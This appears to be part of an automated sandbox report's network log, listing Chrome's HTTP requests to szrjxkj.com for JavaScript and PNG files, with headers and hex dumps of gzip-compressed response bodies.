            Mar 13, 2025 10:53:18.296255112 CET1236INData Raw: d6 c3 13 e8 6d ab 1f fa 13 ec d7 ed 05 76 54 9b e1 f7 ff 11 d7 ef ff e0 7c d0 f9 7c 3c 6d fb 1c 3e 36 b5 18 27 86 ff 2e ab 2e af 65 1b 54 06 90 b1 82 56 f1 8d cc 31 ea ea bb a6 e7 d9 50 72 97 e7 58 96 e4 10 78 65 b6 ed c4 14 7a 92 94 75 05 42 35
            Data Ascii: mvT||<m>6'..eTV1PrXxezuB5L(GM['2:VLYoD(m}!7Qr`me5@/ZD>P*hwS ex9&S;I/VWxpK(.j?/:(OK&#
            Mar 13, 2025 10:53:18.296267986 CET1236INData Raw: 35 cb 01 68 d0 0c e2 f7 cf 21 3c 80 a5 c5 f0 6f 64 f5 8c 1e b7 37 5f b7 45 c7 78 1f 55 cf 49 48 ec 98 3f 1a 50 90 8a 5a 97 0e c1 81 7f cc 3a 15 04 ed 92 e4 7e 12 3e 5e d6 1f ec a2 6d 0a bf 4e d2 b6 8f ec e4 8d 7c ee 6c e9 93 6e a1 a0 57 a6 1c 5c
            Data Ascii: 5h!<od7_ExUIH?PZ:~>^mN|lnW\/K?5F])eu,Rn}.)(oGE$9/^Fj&fq"yMlyV+;-A-] \cc[j(sQ[z>%NaDIG`*,qZ
            Mar 13, 2025 10:53:18.555057049 CET332OUTGET /skin/js/popper.min.js HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:18.901681900 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:18 GMT
            Content-Type: application/javascript
            Last-Modified: Wed, 08 Nov 2023 16:07:20 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb238-4f74"
            Expires: Thu, 13 Mar 2025 21:53:18 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 31 65 62 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 5c 6d 77 db c6 b1 fe de 73 fa 1f a8 36 21 00 13 a4 24 27 b9 b7 17 34 c2 e3 c8 72 eb 56 b6 5c 5b ae 9b d0 3c 31 44 2c 49 c4 20 80 02 a0 64 45 d4 7f bf cf cc ee 62 17 20 a5 b8 39 27 31 81 dd c5 be cc ce cc ce 3c 33 ab c3 47 7f fc 43 ef 24 2f 6e ca 64 b9 aa 7b ee 89 d7 7b 2e 62 51 26 f3 bc f7 53 72 95 a7 79 ef f1 d1 f1 5f d0 e8 59 52 d5 65 72 b9 a9 45 dc db 64 68 d2 ab 57 a2 f7 f2 c5 45 ef 2c 99 8b ac 12 3d 37 55 0f b5 28 d7 55 2f 2a 45 2f aa 7b ab ba 2e 82 c3 c3 bc 40 9b 7c 53 ce c5 28 2f 97 87 aa 69 75 88 0e bc 11 ba 7f 74 e8 2e 36 d9 bc 4e f2 cc 15 7e ed dd 3a f9 e5 2f 62 5e 3b 61 58 df 14 22 5f f4 c4 e7 22 2f eb aa df 77 68 f8 45 92 89 d8 39 d0 95 eb 3c de a4 62 22 7f 46 aa 69 58 bb 5e e0 e8 6e 4d 4f f2 eb 7e 5f fe 8e a2 75 3c 91 8f 6e ed 05 62 f4 3a 2f 0a 51 d2 c7 77 9e 5b af 92 ca 6f 66 86 69 6d b0 52 a2 04 a6 36 d6 e5 3d e1 0a ef b6 14 f5 a6 cc 7a 02 33 9c ca c9 f7 9e ab 25 cd 30 78 78 7b 37 aa f3 b7 f8 34 5b 8e e6 51 9a e2 9b bb a6 87 5a ae 3a [TRUNCATED]
            Data Ascii: 1eb9\mws6!$'4rV\[<1D,I dEb 9'1<3GC$/nd{{.bQ&Sry_YRerEdhWE,=7U(U/*E/{.@|S(/iut.6N~:/b^;aX"_"/whE9<b"FiX^nMO~_u<nb:/Qw[ofimR6=z3%0xx{74[QZ:Ya(FY,NgR'mx[6i$ 7=fn.^Td^e+*j9Tzq>~t7:+J~N33Q>ku;w"<Q~%E_o~8tMoyLpTvA5(< sJv&Xv[C~*U6^+tImakqq~Dk2+,tNDR13.}M<gz3w.pvF5x:wn;E^%$7)iCL-VhVPn56HJSdG[ixl8mK0ZXQ#`#xuWuC2!z-%1$g'^/_W


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.44974138.174.150.133801004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:18.084481001 CET399OUTGET /skin/images/logo-footer.png HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:19.155527115 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:18 GMT
            Content-Type: image/png
            Last-Modified: Wed, 08 Nov 2023 16:08:12 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb26c-91f"
            Expires: Sat, 12 Apr 2025 09:53:18 GMT
            Cache-Control: max-age=2592000
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 39 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 28 08 d7 f7 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 81 00 00 00 65 08 06 00 00 00 6a 75 80 c4 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 c9 49 44 41 54 78 5e ed 9d 3d 8e dd 36 14 46 a7 30 e0 22 55 b6 60 a4 4a 4a 6f 21 5b f0 16 bc 05 b7 01 d2 78 0b 5e 83 fb 34 a9 d2 bb 76 e7 2a 5d 0a 03 2e 53 d9 e7 93 48 41 3f 97 14 29 51 6f a4 f7 ee 01 88 27 f1 92 94 78 ef 27 8a e4 bc 99 79 7a 44 be 7f ff fe 92 f4 8e f4 85 f4 3f e9 73 38 7f 11 8a 38 f7 0c 81 fe 89 f4 37 c9 e2 2f d2 cb 50 d4 b9 47 08 b0 04 f0 8f a2 0d ff 92 7e 27 69 54 d0 e7 7f 24 e1 42 b8 57 08 ec 5c 00 bf 04 53 07 e7 bf 91 5c 08 f7 0a 01 cd 0a 20 42 be 0b e1 1e 21 90 45 02 88 60 77 21 dc 13 04 b0 4a 00 11 ca b9 10 ee 01 02 b7 49 00 11 ca bb 10 ae 0c 01 db 25 80 08 f5 5c 08 57 84 40 35 11 40 84 fa 2e 84 2b 41 80 9a 0a 20 42 3b 2e 84 2b 40 60 0e 11 40 84 f6 5c 08 67 86 80 1c 2a 80 08 ed ba 10 ce 08 81 b8 89 00 22 b4 ef 42 38 13 04 a0 [TRUNCATED]
            Data Ascii: 93b(PNGIHDRejusRGBgAMAaIDATx^=6F0"U`JJo![x^4v*].SHA?)Qo'x'yzD?s887/PG~'iT$BW\S\ B!E`w!JI%\W@5@.+A B;.+@`@\g*"B8ZyA_I"e\g@ppQ4\Sr.[7O*D{B*u!Y-d2[W58tD_HBkpnz".V&}=!8tgRPT6ka8J9.C8Pj)$PRD&[`w!c@d5PsT>+95h@ylGT6}P%gy$/>tX*}.d;8CLh$KC3NpfB3&AgHn^,}JWU!P6suWsp| +W',pB1tZa 5u&e-Pm hTZobrU]-c!
            Mar 13, 2025 10:53:19.155560970 CET1236INData Raw: c4 ef ee ed 22 34 6d 82 f9 5b 5f 6a 9b 08 a8 e6 02 38 02 1c d9 54 08 a1 59 13 cc 9b 45 40 15 17 c0 91 e0 d0 66 42 08 4d 9a 60 de 24 02 8a bb 00 6e 01 8e dd 3c 47 e8 ab 0c b4 fe 0d 24 17 c0 2d c1 c1 9b 84 40 b9 f9 ea a0 c9 36 33 e5 5c 00 cf 01 8e
            Data Ascii: "4m[_j8TYE@fBM`$n<G$-@63\eP8\Wl,n]g@D83P!C@;.+A.+Bz.+Cv.{m\v=B @!Y!px\YG0(($}8t
            Mar 13, 2025 10:53:19.155572891 CET285INData Raw: b0 6f 13 01 29 f5 de 4c fe 38 37 42 99 d4 6e 57 57 97 01 f7 00 08 ff cf 94 08 74 cd d4 50 1d 51 87 ac 79 83 d9 51 92 25 c8 31 ba 9e 35 6f 38 95 08 04 45 52 be c9 c6 04 fb 66 11 58 4b 13 73 07 cc 82 b2 d6 0d 77 17 e6 33 e9 60 3e 34 0f b1 02 a7 51
            Data Ascii: o)L87BnWWtPQyQ%15o8ERfXKsw3`>4Qi{O=E$"&PDeEp$_tQTN)P&Qg'd}wiBrYxzyA#k{q.;$i]sRMn'A!VNM?Ar
            Mar 13, 2025 10:54:04.168025017 CET6OUTData Raw: 00
            Data Ascii:


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.44974238.174.150.133801004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:18.084984064 CET341OUTGET /skin/js/modernizr-3.6.0.min.js HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:19.015476942 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:18 GMT
            Content-Type: application/javascript
            Last-Modified: Wed, 08 Nov 2023 16:07:04 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb228-21be"
            Expires: Thu, 13 Mar 2025 21:53:18 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 65 63 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 5a fb 73 db b8 b5 fe bd 33 fd 1f 28 74 47 43 ae 20 da de 3e e6 5e 69 71 55 59 4d 77 d3 c6 b1 1b fb 76 67 ae ea 66 28 12 92 18 53 84 42 40 96 1d 49 fd db fb 1d 80 2f c9 f6 74 6e 76 36 22 5e 07 c0 79 7e e7 20 67 df 77 bc 95 4a 64 91 a7 df 0a ef b7 e1 1f c2 73 cf 9f 6c b4 51 2b ef 72 93 66 49 e0 ed bd ab f7 77 de f7 bf fe 95 f7 bd b7 34 66 ad 07 67 67 f5 92 30 56 ab b3 44 6d f3 4c 45 c9 d9 a8 1f 6b 1d e5 e9 2a 32 a9 ca 35 b5 62 95 6d 56 f4 69 69 ca 4c ae 64 6e 74 7f 9e c9 a7 99 7a ea 2f 53 74 17 cf fd 75 1a 9b 4d 21 fb 6b 95 e6 46 16 f2 d1 ce 5a 2b 6d 56 12 24 17 b2 af d3 6f 52 f7 75 11 6b 69 fa 5b 39 5b 64 f4 b7 56 f1 83 c4 4c 7c 6e 55 f1 20 0b dd 8f 92 c4 48 6d fa 89 5a ad 0b 39 4f 9f b0 6c 19 69 4b b2 bf fa da 2f 3b 13 1c ee 31 ca 36 d8 b3 9a 05 ca 71 16 69 8d 05 44 21 ca b2 75 a1 d6 ae 41 5f b6 57 9b e7 4c 6a af f3 fd d9 af 7f d5 99 6f f2 98 ae ea 4b 6e 78 1e ec aa b6 57 50 4f b0 2b 24 6e 95 7b e6 79 2d d5 dc 93 42 08 73 a8 e7 28 3f d8 3d 46 85 67 d7 [TRUNCATED]
            Data Ascii: ec1Zs3(tGC >^iqUYMwvgf(SB@I/tnv6"^y~ gwJdslQ+rfIw4fgg0VDmLEk*25bmViiLdntz/StuM!kFZ+mV$oRuki[9[dVL|nU HmZ9OliK/;16qiD!uA_WLjoKnxWPO+$n{y-Bs(?=FgrSy4KsosGy _=7b2Jv];4bAYjm%a~+d0 3|bY9gzAwKEzRU,a:``Sl(-Rl<:,5>Y/6yM#!<&!]*(SBVcll~A|$c>zQ3|F#R_:06Rc36><AFpq=ZGW<e/*\{Z=:.`HrE~`Vv#R.h,N?Z7.+LH;u}ad;2<vs%2r'<V!)R)|Z(7RBaR8Du7`aW[:l?:l:l;
            Mar 13, 2025 10:53:19.015494108 CET224INData Raw: 3b 42 af eb b0 1d 3b d2 61 db e3 6e 07 f6 f3 d4 9f fa a6 db 3d c7 e5 5a 5a 5c 34 5a 0c 1e b4 54 c0 14 e9 62 21 9d 0f 3c 9c 72 a1 91 65 04 07 e8 46 1b b6 d4 ec 33 61 5c c8 c8 c8 77 2e 64 c0 31 1c b5 fd a8 58 6c 6c 2c c1 49 83 c1 d3 e9 f8 47 28 10
            Data Ascii: ;B;an=ZZ\4ZTb!<reF3a\w.d1Xll,IG(o8noCU,~8???Fu"f&S"Fv0<zsRQ^pBy"rc T*B)^;=,ai&o4j-$=
            Mar 13, 2025 10:53:19.015506029 CET1236INData Raw: 5d 04 3c a6 4b c9 3c 99 2c 11 dc fd 4d 50 1d 3b a5 65 36 b6 61 97 34 24 93 12 cc c8 27 73 86 38 c9 d0 03 52 4c b3 5e c2 fd b5 bd c9 68 3d 88 83 23 62 29 8e 77 d4 11 13 25 4b f3 76 29 a5 19 b5 1b 21 c8 de 81 bc 90 83 f4 68 51 25 03 1a fc 08 1e c0
            Data Ascii: ]<K<,MP;e6a4$'s8RL^h=#b)w%Kv)!hQ%%}3Lo_BcQLm[I"sc|{t5"c.~W1t$<G.~biArpz 70XOaot=1Q`Jmw}34
            Mar 13, 2025 10:53:19.015517950 CET224INData Raw: be c7 8e c8 42 15 18 fc 20 68 57 35 21 f1 ce 12 be 19 36 a5 9e b2 68 23 76 87 93 ba cc f0 06 6e 5c 1e e9 3b 59 00 6c 0c 89 c8 b1 19 1c 6b 4d 15 73 ac fd 77 bb 76 09 10 91 29 36 31 8a 63 61 2d 98 a9 b9 3f 22 73 68 34 c7 ba 93 92 8e db 90 30 1a e4
            Data Ascii: B hW5!6h#vn\;YlkMswv)61ca-?"sh40d8-~UKTB%4Hz,)S,U5+;[!pIsag$4[%1BDQAl6Wx>VEvU*/g*t%D
            Mar 13, 2025 10:53:19.102205992 CET1236INData Raw: 80 00 6b 50 cf b1 c9 1e 12 45 c1 54 0e c4 cf 95 20 d8 e9 19 de 51 d0 0f aa a6 84 60 f7 d8 80 65 33 60 a7 72 65 b5 ec 78 90 54 12 a8 4c bd 5a 7b 00 13 38 c2 89 8d b1 44 16 9f 08 b6 28 14 ba a4 a6 de c1 66 61 2a 18 20 0a d2 5d 0a d1 41 fd 25 9f 65
            Data Ascii: kPET Q`e3`rexTLZ{8D(fa* ]A%e0_P=A]QU<X^}k:(+~Zpj7{eE5`Cd3io)4"gg;]oUP_L&G=`!H_]I8W
            Mar 13, 2025 10:53:19.102231026 CET27INData Raw: 75 0e fe d6 06 47 5e e5 dd c1 f0 df a5 4e dd aa be 21 00 00 0d 0a 30 0d 0a 0d 0a
            Data Ascii: uG^N!0
            Mar 13, 2025 10:53:19.127037048 CET326OUTGET /skin/js/main.js HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:19.483457088 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:19 GMT
            Content-Type: application/javascript
            Last-Modified: Wed, 08 Nov 2023 16:07:40 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb24c-4e50"
            Expires: Thu, 13 Mar 2025 21:53:19 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 31 30 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 7b 6f 1b 37 12 ff bf 40 bf 03 9b a4 90 d4 44 b2 9d 6b d2 8b da 04 70 6c e7 e2 bb 38 ce c5 ce b5 87 a2 28 d6 2b 4a da 66 5f dd 87 6d f5 e0 ef 7e bf 21 97 bb dc 25 b9 92 9c e4 80 43 a3 a2 b1 a0 1d 0e 87 c3 99 e1 bc b8 3b df 7c f9 05 fb 86 7d 7d cb 0f 0d 16 08 ce 79 94 86 5e c1 d9 6b 2f e2 53 b6 9f a6 d1 2a 08 d9 98 3d 2f f3 20 e6 79 ce 0e 92 38 2f c3 22 88 17 ec 79 92 14 79 91 79 e9 b7 cd 38 c6 da 78 de bd 3d 9e b2 65 51 a4 f9 74 67 a7 58 f2 88 47 5e e6 2f 27 7e 12 ed cc 78 94 ec 2c 8b 28 dc f1 e4 3c 3b 62 ec 21 cf fd 2c 48 8b 20 89 1b 0a 82 9c 79 ec 42 11 e1 37 44 bc 3c 3f 79 c5 0a 45 f6 d5 32 f0 97 0c c8 79 ce ae 82 62 c9 30 25 2b e3 e0 f7 92 33 2f 9e 31 3f e4 5e cc 66 3c 0f 16 f1 84 1d 17 6c c9 c3 34 67 ab a4 64 45 c2 fc 8c d3 da 31 11 f7 ca 22 98 97 a1 7b ca 2b 7e 91 07 05 97 48 3c 50 17 e6 09 e3 63 4c 1d f1 cc e7 2c 2f d3 34 c9 8a 09 3b 6a 7e 4b bd 05 e8 f2 32 ce 82 d8 0f cb 19 9f b1 24 06 89 58 9c 5a c1 44 b0 60 bf 2c 96 49 36 65 e7 35 c3 b4 [TRUNCATED]
            Data Ascii: 10ef\{o7@Dkpl8(+Jf_m~!%C;|}}y^k/S*=/ y8/"yyy8x=eQtgXG^/'~x,(<;b!,H yB7D<?yE2yb0%+3/1?^f<l4gdE1"{+~H<PcL,/4;j~K2$XZD`,I6e5YOx=;{K`_~$;("2Ib7KxCH}qBssaga`MkYgqL&9"daE%q%qP"g{@zwvIa_$:!/,bG9'~!;O~o+4#NKI{f7itez\^Ff_g~jL69;jYNE7FVL5h TfGGQ5_~1WJF?rwJ@w'+A|c"<[M_y[%e&$$FWA<KF$$7Lh*1Mf<VG{ZA&WH.)
            Mar 13, 2025 10:53:19.483485937 CET1236INData Raw: f9 55 25 3e 42 46 26 cd c3 61 7b 5c 75 06 62 08 38 2b d1 55 ac 6c 56 a7 9b aa 7a 7d 04 55 13 ac 43 4c 5d ab a4 11 96 95 ce c1 26 b9 fe 8b b2 28 92 18 8b 27 8e f9 21 34 d7 cd 32 42 26 11 d2 41 36 9a a4 38 df 62 f0 a8 cb 47 3b f3 d4 e8 1b c5 4d fa
            Data Ascii: U%>BF&a{\ub8+UlVz}UCL]&('!42B&A68bG;MAcb+a-g_,%B[1]brpPeBR1}\X1ALzFF2~^V5-=Z(\uzww(olD],
            Mar 13, 2025 10:53:19.483499050 CET448INData Raw: 68 5d 72 13 d6 a2 42 86 3c d1 84 95 66 6f b3 aa 89 4e 92 2c af be e7 ab 4b 2f 2c b9 51 5f 85 c8 3a d8 9c 52 e7 ca c1 d2 8b 17 3c db 8c d3 62 c4 78 16 2c 82 62 c3 92 30 2d 90 ec 0e 5a 73 8a 65 b8 12 92 60 94 86 05 5a b4 a4 a0 0c 46 f8 2b 58 63 25
            Data Ascii: h]rB<foN,K/,Q_:R<bx,b0-Zse`ZF+Xc%JQ{$fJdtCDU%,0AzJmN,ow`L[: tQ15Vd|0FH>$!.ro%#5`{>o0yG-|v
            Mar 13, 2025 10:53:19.484546900 CET1236INData Raw: 51 03 f6 a8 12 62 9b 7f 4a cc ac 43 b0 29 05 91 d5 3c 13 af 28 32 a0 cb f8 1c be fb 44 8f 43 d0 57 ff f8 d1 c8 62 db 1e 30 68 84 21 62 6b 36 47 6f b0 6d 6f 8c 78 22 3b 6f 37 f2 ce f5 7e 49 b9 a6 f5 aa 2f 03 67 19 b1 68 a1 28 7b f6 94 ed 59 f7 8c
            Data Ascii: QbJC)<(2DCWb0h!bk6Gomox";o7~I/gh({YVi4rV pv; p z}[N'sky#b&(6g'RU%dM@ch]zUd4xdHOS+[5p>a#.bv^#g,<?D2
            Mar 13, 2025 10:53:19.484561920 CET586INData Raw: c6 82 ed ff 7d ff 27 cb 34 f7 44 68 d2 a7 f4 c5 2a a5 c8 e4 cd e9 d9 b9 2d 36 51 52 28 c2 07 45 a5 4c 6a 52 ec 48 e9 29 87 91 a0 91 b4 78 c8 3d f6 8c d6 69 2e 87 60 6e 90 03 b5 2d 95 9e 4d 66 09 0e a0 46 6f aa eb 75 dc 7a 7a 29 52 b1 0f 27 de 7b
            Data Ascii: }'4Dh*-6QR(ELjRH)x=i.`n-MfFouzz)R'{zQ,WC#yCDX._!!;HwJ=Eqf\DdMvHhtl^q4N$` euaHDF#BMNH>0wJu#
            Mar 13, 2025 10:54:04.496100903 CET6OUTData Raw: 00
            Data Ascii:


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.44974338.174.150.133801004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:18.316760063 CET290OUTGET /skin/images/logo-white.png HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:19.244543076 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:19 GMT
            Content-Type: image/png
            Last-Modified: Wed, 08 Nov 2023 16:08:12 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb26c-91f"
            Expires: Sat, 12 Apr 2025 09:53:19 GMT
            Cache-Control: max-age=2592000
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 39 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 28 08 d7 f7 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 81 00 00 00 65 08 06 00 00 00 6a 75 80 c4 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 c9 49 44 41 54 78 5e ed 9d 3d 8e dd 36 14 46 a7 30 e0 22 55 b6 60 a4 4a 4a 6f 21 5b f0 16 bc 05 b7 01 d2 78 0b 5e 83 fb 34 a9 d2 bb 76 e7 2a 5d 0a 03 2e 53 d9 e7 93 48 41 3f 97 14 29 51 6f a4 f7 ee 01 88 27 f1 92 94 78 ef 27 8a e4 bc 99 79 7a 44 be 7f ff fe 92 f4 8e f4 85 f4 3f e9 73 38 7f 11 8a 38 f7 0c 81 fe 89 f4 37 c9 e2 2f d2 cb 50 d4 b9 47 08 b0 04 f0 8f a2 0d ff 92 7e 27 69 54 d0 e7 7f 24 e1 42 b8 57 08 ec 5c 00 bf 04 53 07 e7 bf 91 5c 08 f7 0a 01 cd 0a 20 42 be 0b e1 1e 21 90 45 02 88 60 77 21 dc 13 04 b0 4a 00 11 ca b9 10 ee 01 02 b7 49 00 11 ca bb 10 ae 0c 01 db 25 80 08 f5 5c 08 57 84 40 35 11 40 84 fa 2e 84 2b 41 80 9a 0a 20 42 3b 2e 84 2b 40 60 0e 11 40 84 f6 5c 08 67 86 80 1c 2a 80 08 ed ba 10 ce 08 81 b8 89 00 22 b4 ef 42 38 13 04 a0 [TRUNCATED]
            Data Ascii: 93b(PNGIHDRejusRGBgAMAaIDATx^=6F0"U`JJo![x^4v*].SHA?)Qo'x'yzD?s887/PG~'iT$BW\S\ B!E`w!JI%\W@5@.+A B;.+@`@\g*"B8ZyA_I"e\g@ppQ4\Sr.[7O*D{B*u!Y-d2[W58tD_HBkpnz".V&}=!8tgRPT6ka8J9.C8Pj)$PRD&[`w!c@d5PsT>+95h@ylGT6}P%gy$/>tX*}.d;8CLh$KC3NpfB3&AgHn^,}JWU!P6suWsp| +W',pB1tZa 5u&e-Pm hTZobrU]-c!
            Mar 13, 2025 10:53:19.244560003 CET1236INData Raw: c4 ef ee ed 22 34 6d 82 f9 5b 5f 6a 9b 08 a8 e6 02 38 02 1c d9 54 08 a1 59 13 cc 9b 45 40 15 17 c0 91 e0 d0 66 42 08 4d 9a 60 de 24 02 8a bb 00 6e 01 8e dd 3c 47 e8 ab 0c b4 fe 0d 24 17 c0 2d c1 c1 9b 84 40 b9 f9 ea a0 c9 36 33 e5 5c 00 cf 01 8e
            Data Ascii: "4m[_j8TYE@fBM`$n<G$-@63\eP8\Wl,n]g@D83P!C@;.+A.+Bz.+Cv.{m\v=B @!Y!px\YG0(($}8t
            Mar 13, 2025 10:53:19.244573116 CET285INData Raw: b0 6f 13 01 29 f5 de 4c fe 38 37 42 99 d4 6e 57 57 97 01 f7 00 08 ff cf 94 08 74 cd d4 50 1d 51 87 ac 79 83 d9 51 92 25 c8 31 ba 9e 35 6f 38 95 08 04 45 52 be c9 c6 04 fb 66 11 58 4b 13 73 07 cc 82 b2 d6 0d 77 17 e6 33 e9 60 3e 34 0f b1 02 a7 51
            Data Ascii: o)L87BnWWtPQyQ%15o8ERfXKsw3`>4Qi{O=E$"&PDeEp$_tQTN)P&Qg'd}wiBrYxzyA#k{q.;$i]sRMn'A!VNM?Ar
            Mar 13, 2025 10:54:04.246130943 CET6OUTData Raw: 00
            Data Ascii:


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.44974438.174.150.133801004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:18.562227011 CET296OUTGET /skin/images/download-bgshape.png HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:19.517299891 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:19 GMT
            Content-Type: image/png
            Last-Modified: Wed, 08 Nov 2023 16:08:10 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb26a-8aec"
            Expires: Sat, 12 Apr 2025 09:53:19 GMT
            Cache-Control: max-age=2592000
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 34 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 5b 79 3c d4 eb f7 4f 42 b9 51 c2 cd ee 57 6e 25 2a b2 ef 5a 30 ae 4a 91 31 f6 25 31 b2 17 1a db 8c 2d 29 59 ae 5b c8 3a 65 12 66 98 49 f6 6d ec 74 6d 63 aa 31 b2 8d a5 31 32 98 61 98 19 c6 f2 fb e8 fb 87 97 97 31 9f e7 39 e7 39 ef 73 9e 73 de e7 7c 5e de b3 06 89 08 cb 08 1f 3a 74 48 e4 6f 4b 33 db 43 87 0e db 01 3f 72 47 05 81 4f d4 5f ab 2b 03 bf f8 42 6d 41 37 0e 61 87 e5 7e 01 7f 1c 81 5e bf 73 fd d0 a1 aa 8c 3f 76 3c 05 0e 1d 4a c9 fe db ec ba 5d 84 db 4a 6b 73 9d 52 eb bf 1f 7e 74 5a 9e 7b 63 6b f5 87 52 8d 3a 63 3f c5 d8 b3 e2 d3 a5 5b b7 60 87 1e 9f d1 fd 2f b0 6e b4 5e 2e c4 e5 b0 d8 c3 43 6c 4d d6 cf 2d 77 1b 09 73 9b ef bf f6 f7 28 fb bc fd e5 1d 50 47 ec 9f ff b7 2f 55 7d 57 cc fc e0 1f 1b d1 66 4a 35 7c 5e 1b ee b2 fb d1 f3 fb 47 f7 29 67 97 f7 f7 83 3c 44 07 37 fb 02 56 72 5e 15 2b a7 14 2b 6f 07 74 8c 2d 97 45 26 f0 2d a5 8a df f9 37 ef 1c 1b 39 cb 9a 71 ba 0a 39 78 5e 02 fe f1 a9 d2 4d d6 07 8b 64 9f d2 44 c1 25 e1 82 5b b8 e4 da f6 [TRUNCATED]
            Data Ascii: 4000$[y<OBQWn%*Z0J1%1-)Y[:efImtmc112a199ss|^:tHoK3C?rGO_+BmA7a~^s?v<J]JksR~tZ{ckR:c?[`/n^.ClM-ws(PG/U}WfJ5|^G)g<D7Vr^++ot-E&-79q9x^MdD%[=.[(f=.5jd.2~?nnz";K]"BiB08\ahgxqr\?/fQ57H,WyRHRx0?g%"&rE6sopCvfk9oS%7b\?yWRiFLqm"pQeM;fQ4Z^V~v`2o.H]o4m4Z6oXHzb]XR+8F$}16TvF(Y)QT8t"+YCF-2~df43yAeIP-n]UUu%c]Z/u2QX~dR -hHtfrlRegJGm-k#
